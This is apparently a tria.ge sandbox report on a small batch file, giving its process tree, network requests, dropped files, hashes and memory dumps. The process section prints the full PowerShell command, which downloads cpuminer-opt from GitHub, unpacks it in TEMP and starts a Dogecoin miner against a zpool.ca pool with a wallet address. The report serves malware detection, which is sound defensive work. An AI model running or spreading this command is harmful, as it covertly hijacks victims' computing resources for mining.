Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    1795s
  • max time network
    1806s
  • platform
    windows10-1703_x64
  • resource
    win10-20231215-ja
  • resource tags

    arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
  • submitted
    01/02/2024, 23:55 UTC

General

  • Target

    73u3Ito.bat

  • Size

    499B

  • MD5

    fe74bff27516829a88cfbc6f6e99646f

  • SHA1

    0c15d859211c79910b277d07e729bec7197a60cd

  • SHA256

    b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

  • SHA512

    a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4936
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2172
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3892
        • C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:4620

Network

  • flag-us
    DNS
    github.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    github.com
    IN A
    Response
    github.com
    IN A
    140.82.121.4
  • flag-de
    GET
    https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip
    powershell.exe
    Remote address:
    140.82.121.4:443
    Request
    GET /JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; ja-JP) WindowsPowerShell/5.1.15063.0
    Host: github.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    Server: GitHub.com
    Date: Thu, 01 Feb 2024 23:57:33 GMT
    Content-Type: text/html; charset=utf-8
    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
    Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/51284118/46f2f116-d014-4e7d-b81d-eea84bd0fd1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240201%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240201T235733Z&X-Amz-Expires=300&X-Amz-Signature=4b9f9f74a60678178529496ff31908f90cb3754c85b09147b24d60ec6f8cb05c&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=51284118&response-content-disposition=attachment%3B%20filename%3Dcpuminer-opt-23.15-windows.zip&response-content-type=application%2Foctet-stream
    Cache-Control: no-cache
    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
    X-Frame-Options: deny
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0
    Referrer-Policy: no-referrer-when-downgrade
    Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events api.githubcopilot.com objects-origin.githubusercontent.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
    Content-Length: 0
    X-GitHub-Request-Id: C28B:53831:1429D97E:1465039C:65BC2FEC
  • flag-us
    DNS
    objects.githubusercontent.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    objects.githubusercontent.com
    IN A
    Response
    objects.githubusercontent.com
    IN A
    185.199.108.133
    objects.githubusercontent.com
    IN A
    185.199.109.133
    objects.githubusercontent.com
    IN A
    185.199.110.133
    objects.githubusercontent.com
    IN A
    185.199.111.133
  • flag-us
    GET
    https://objects.githubusercontent.com/github-production-release-asset-2e65be/51284118/46f2f116-d014-4e7d-b81d-eea84bd0fd1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240201%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240201T235733Z&X-Amz-Expires=300&X-Amz-Signature=4b9f9f74a60678178529496ff31908f90cb3754c85b09147b24d60ec6f8cb05c&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=51284118&response-content-disposition=attachment%3B%20filename%3Dcpuminer-opt-23.15-windows.zip&response-content-type=application%2Foctet-stream
    powershell.exe
    Remote address:
    185.199.108.133:443
    Request
    GET /github-production-release-asset-2e65be/51284118/46f2f116-d014-4e7d-b81d-eea84bd0fd1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240201%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240201T235733Z&X-Amz-Expires=300&X-Amz-Signature=4b9f9f74a60678178529496ff31908f90cb3754c85b09147b24d60ec6f8cb05c&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=51284118&response-content-disposition=attachment%3B%20filename%3Dcpuminer-opt-23.15-windows.zip&response-content-type=application%2Foctet-stream HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; ja-JP) WindowsPowerShell/5.1.15063.0
    Host: objects.githubusercontent.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 18353564
    Content-Type: application/octet-stream
    Content-MD5: o9vnhIGbDner0qCCrwwyiA==
    Last-Modified: Thu, 30 Nov 2023 19:41:07 GMT
    ETag: "0x8DBF1DC4BEC4077"
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: d190fa92-001e-0015-362f-4ff6e6000000
    x-ms-version: 2020-10-02
    x-ms-creation-time: Thu, 30 Nov 2023 19:41:07 GMT
    x-ms-lease-status: unlocked
    x-ms-lease-state: available
    x-ms-blob-type: BlockBlob
    Content-Disposition: attachment; filename=cpuminer-opt-23.15-windows.zip
    x-ms-server-encrypted: true
    Via: 1.1 varnish, 1.1 varnish
    Accept-Ranges: bytes
    Age: 0
    Date: Thu, 01 Feb 2024 23:57:33 GMT
    X-Served-By: cache-iad-kcgs7200050-IAD, cache-lon4220-LON
    X-Cache: HIT, MISS
    X-Cache-Hits: 760, 0
    X-Timer: S1706831853.493195,VS0,VE392
  • flag-us
    DNS
    4.121.82.140.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    4.121.82.140.in-addr.arpa
    IN PTR
    Response
    4.121.82.140.in-addr.arpa
    IN PTR
    lb-140-82-121-4-fragithubcom
  • flag-us
    DNS
    133.108.199.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.108.199.185.in-addr.arpa
    IN PTR
    Response
    133.108.199.185.in-addr.arpa
    IN PTR
    cdn-185-199-108-133githubcom
  • flag-us
    DNS
    79.121.231.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    79.121.231.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    yespower.na.mine.zpool.ca
    cpuminer-sse2.exe
    Remote address:
    8.8.8.8:53
    Request
    yespower.na.mine.zpool.ca
    IN A
    Response
    yespower.na.mine.zpool.ca
    IN A
    198.50.168.213
  • flag-us
    DNS
    213.168.50.198.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    213.168.50.198.in-addr.arpa
    IN PTR
    Response
    213.168.50.198.in-addr.arpa
    IN PTR
    minezpoolca
  • flag-us
    DNS
    14.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    14.227.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    114.110.16.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    114.110.16.96.in-addr.arpa
    IN PTR
    Response
    114.110.16.96.in-addr.arpa
    IN PTR
    a96-16-110-114deploystaticakamaitechnologiescom
  • flag-us
    DNS
    210.143.182.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    210.143.182.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    180.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    180.178.17.96.in-addr.arpa
    IN PTR
    Response
    180.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-180deploystaticakamaitechnologiescom
  • flag-us
    DNS
    81.171.91.138.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    81.171.91.138.in-addr.arpa
    IN PTR
    Response
  • 140.82.121.4:443
    https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip
    tls, http
    powershell.exe
    918 B
    6.6kB
    9
    8

    HTTP Request

    GET https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip

    HTTP Response

    302
  • 185.199.108.133:443
    https://objects.githubusercontent.com/github-production-release-asset-2e65be/51284118/46f2f116-d014-4e7d-b81d-eea84bd0fd1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240201%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240201T235733Z&X-Amz-Expires=300&X-Amz-Signature=4b9f9f74a60678178529496ff31908f90cb3754c85b09147b24d60ec6f8cb05c&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=51284118&response-content-disposition=attachment%3B%20filename%3Dcpuminer-opt-23.15-windows.zip&response-content-type=application%2Foctet-stream
    tls, http
    powershell.exe
    377.5kB
    18.9MB
    7607
    13594

    HTTP Request

    GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/51284118/46f2f116-d014-4e7d-b81d-eea84bd0fd1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240201%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240201T235733Z&X-Amz-Expires=300&X-Amz-Signature=4b9f9f74a60678178529496ff31908f90cb3754c85b09147b24d60ec6f8cb05c&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=51284118&response-content-disposition=attachment%3B%20filename%3Dcpuminer-opt-23.15-windows.zip&response-content-type=application%2Foctet-stream

    HTTP Response

    200
  • 198.50.168.213:6234
    yespower.na.mine.zpool.ca
    cpuminer-sse2.exe
    56.3kB
    45.1kB
    544
    320
  • 127.0.0.1:49907
    cpuminer-sse2.exe
  • 127.0.0.1:49909
    cpuminer-sse2.exe
  • 8.8.8.8:53
    github.com
    dns
    powershell.exe
    56 B
    72 B
    1
    1

    DNS Request

    github.com

    DNS Response

    140.82.121.4

  • 8.8.8.8:53
    objects.githubusercontent.com
    dns
    powershell.exe
    75 B
    139 B
    1
    1

    DNS Request

    objects.githubusercontent.com

    DNS Response

    185.199.108.133
    185.199.109.133
    185.199.110.133
    185.199.111.133

  • 8.8.8.8:53
    4.121.82.140.in-addr.arpa
    dns
    71 B
    115 B
    1
    1

    DNS Request

    4.121.82.140.in-addr.arpa

  • 8.8.8.8:53
    133.108.199.185.in-addr.arpa
    dns
    74 B
    118 B
    1
    1

    DNS Request

    133.108.199.185.in-addr.arpa

  • 8.8.8.8:53
    79.121.231.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    79.121.231.20.in-addr.arpa

  • 8.8.8.8:53
    yespower.na.mine.zpool.ca
    dns
    cpuminer-sse2.exe
    71 B
    87 B
    1
    1

    DNS Request

    yespower.na.mine.zpool.ca

    DNS Response

    198.50.168.213

  • 8.8.8.8:53
    213.168.50.198.in-addr.arpa
    dns
    73 B
    100 B
    1
    1

    DNS Request

    213.168.50.198.in-addr.arpa

  • 8.8.8.8:53
    14.227.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    14.227.111.52.in-addr.arpa

  • 8.8.8.8:53
    114.110.16.96.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    114.110.16.96.in-addr.arpa

  • 8.8.8.8:53
    210.143.182.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    210.143.182.52.in-addr.arpa

  • 8.8.8.8:53
    180.178.17.96.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    180.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    81.171.91.138.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    81.171.91.138.in-addr.arpa

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3znixchz.ui5.ps1

    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

  • C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

    Filesize

    1.2MB

    MD5

    660d14eb3c292b36dcd9bf058e2c0430

    SHA1

    b552e1fe31d53cc1b030f2d8dd28da187166a2b4

    SHA256

    a3930e2a51876082e01ae4b03a5c7195cc94c1e23f3d70778b10565433ef4396

    SHA512

    75b03a830fc39e9fa0ec43ecab8bd49b0b1eefbc27ed612ae3f12a6cecc45e1e2ce3d1c581a0b0fe5c7b466865d8d40775884957ff0dc7970f6c1afda02421f8

  • C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

    Filesize

    1005KB

    MD5

    57167ffdbf18357fa913a9f52f0ff4f8

    SHA1

    72f80689f5eafe73fe2054f52ab1592b0a8902bd

    SHA256

    01ea7111be5775ddf2d4d6c62393168e25fe389beba4adb0c8d285ac71360cf8

    SHA512

    daa2d4f6ea6cb98ff5152fda754862b4d927e883f046aec2ec46a67da9e06d91a5b7920d9caf18ac81971d3dfc925ecea1ef18ec9e7abae2b0a665356e97cdf6

  • C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

    Filesize

    836KB

    MD5

    aeab40ed9a8e627ea7cefc1f5cf9bf7a

    SHA1

    5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

    SHA256

    218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

    SHA512

    c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

  • C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

    Filesize

    668KB

    MD5

    85c2616d428b52f8c6ea1c95e7616f74

    SHA1

    09b10c96c22766b030aad0c09d375887cff73baa

    SHA256

    fdde7602f3db8aed301e636e92076732c18b60c0efcaa95214215fb5821e4606

    SHA512

    e39c0cabe7c06072256fb496cead20dde3e423a2d542cba7d1c985e32dfcd32af33b2a8f0283721f89712c7020242d478226dd564adb4207664e8745ac5c5f8a

  • C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

    Filesize

    644KB

    MD5

    0dc0d5332fb653828ee94648fa2b8073

    SHA1

    8bbac56ea7390f908961615748bf131f037c02dc

    SHA256

    b53852bc869bd2583854a2a133625891e39056988bd6c356e069b117b52bd88d

    SHA512

    72a4182b9235f6dcb2536f77a80d46ebb207f4fc0b50bb5dbf92e21f0f25fc5de80302cb6d40033619e308039b9b1d9813ff38b5acbdac94f9b54be255a90c8d

  • \Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

    Filesize

    692KB

    MD5

    d1b635c9bca7eb2527ac7f8e05edb394

    SHA1

    78556805f7754e216c9bee6fa8cf1b479b218427

    SHA256

    ef71e3bb7e68c024ce9ba692a0e8259a62f7bb237fec0817ca5186133741aa27

    SHA512

    fda726dd8172dd55d92105840416227f18b5342054cd95e1e09744901b57bd68391fc28ce75c2f9647be6dab5097fd891127aec36565b63c2490c805d72fdf33

  • \Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

    Filesize

    853KB

    MD5

    3d8671aa1701e511d45ffec439206bb9

    SHA1

    47453987837e114a08ac9fb042d56e0a6b8310c6

    SHA256

    a335fe3223730a0c5c2c1d8ef283269c285db5336614f31779e527cef822ba0b

    SHA512

    b96b1a5786ac522511576f2528276ea051bab1d7e6c2bbe6d1de5aaffd07c8a7b953746e1846ce4bb122a37a2258ef709c3b6f9961155d47605781b483ef14b2

  • \Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

    Filesize

    600KB

    MD5

    e84745a3244c09e4e075828bf84ead2d

    SHA1

    fe66f8d90f5ad97c8b4d2c50c8c4cfb3c86dc1e9

    SHA256

    701ff0a36ef0d28523af4a1293686e04e6d563326b2ba61a08fb759d3da7dbfb

    SHA512

    dfe4992afd6e9e332ea7bdbf507585981e07e17b6020e74c3482c2b28aca9142a086b7333803140c6f97008adfdf79de6dcf7aaa01bbfd006d83c8e296de1eb9

  • \Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

    Filesize

    617KB

    MD5

    8dddb2d69671e86d75d9775ac6459a20

    SHA1

    1a7b07fb8d0f5d68f9ff9a7445aa8cf07ccfd171

    SHA256

    5f2981393cb14174b4018a3a46cee8eb7944244dea55da80c272fe21c600a189

    SHA512

    9c740984fd11ceb791db28a39fd43d11a15cd551ee4495ecfe70fb49e8ce9dc2478d7d7144eb114c8c41bbcb5667b929fbeff5710f1a91c1ad89f0c2daae671a

  • \Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

    Filesize

    606KB

    MD5

    585efec1bc1d4d916a4402c9875dff75

    SHA1

    d209613666ccac9d0ddab29a3bc59aa00a0968fa

    SHA256

    2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

    SHA512

    b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

  • memory/2172-31-0x000002D9F0DC0000-0x000002D9F0DD6000-memory.dmp

    Filesize

    88KB

  • memory/2172-6-0x000002D9F0900000-0x000002D9F0922000-memory.dmp

    Filesize

    136KB

  • memory/2172-36-0x000002D9F0A30000-0x000002D9F0A40000-memory.dmp

    Filesize

    64KB

  • memory/2172-56-0x000002D9F0F60000-0x000002D9F0F72000-memory.dmp

    Filesize

    72KB

  • memory/2172-69-0x000002D9F0A20000-0x000002D9F0A2A000-memory.dmp

    Filesize

    40KB

  • memory/2172-112-0x000002D9F1000000-0x000002D9F10CC000-memory.dmp

    Filesize

    816KB

  • memory/2172-33-0x000002D9F1000000-0x000002D9F10CC000-memory.dmp

    Filesize

    816KB

  • memory/2172-4-0x000002D9F0930000-0x000002D9F09C2000-memory.dmp

    Filesize

    584KB

  • memory/2172-28-0x000002D9F0A30000-0x000002D9F0A40000-memory.dmp

    Filesize

    64KB

  • memory/2172-13-0x000002D9F0DE0000-0x000002D9F0E56000-memory.dmp

    Filesize

    472KB

  • memory/2172-10-0x000002D9F0C50000-0x000002D9F0D5E000-memory.dmp

    Filesize

    1.1MB

  • memory/2172-9-0x000002D9F0A30000-0x000002D9F0A40000-memory.dmp

    Filesize

    64KB

  • memory/2172-8-0x000002D9F0A30000-0x000002D9F0A40000-memory.dmp

    Filesize

    64KB

  • memory/2172-7-0x00007FF8D9500000-0x00007FF8D9EEC000-memory.dmp

    Filesize

    9.9MB

  • memory/2172-117-0x00007FF8D9500000-0x00007FF8D9EEC000-memory.dmp

    Filesize

    9.9MB

  • memory/2172-34-0x00007FF8D9500000-0x00007FF8D9EEC000-memory.dmp

    Filesize

    9.9MB

  • memory/2172-5-0x000002D9F08C0000-0x000002D9F08D0000-memory.dmp

    Filesize

    64KB

  • memory/4620-141-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4620-181-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4620-127-0x0000000070800000-0x00000000708BC000-memory.dmp

    Filesize

    752KB

  • memory/4620-126-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4620-130-0x0000000000F40000-0x00000000027F5000-memory.dmp

    Filesize

    24.7MB

  • memory/4620-136-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4620-151-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4620-129-0x0000000061150000-0x00000000611E8000-memory.dmp

    Filesize

    608KB

  • memory/4620-128-0x0000000061440000-0x000000006156B000-memory.dmp

    Filesize

    1.2MB

  • memory/4620-156-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4620-171-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4620-176-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4620-146-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4620-186-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.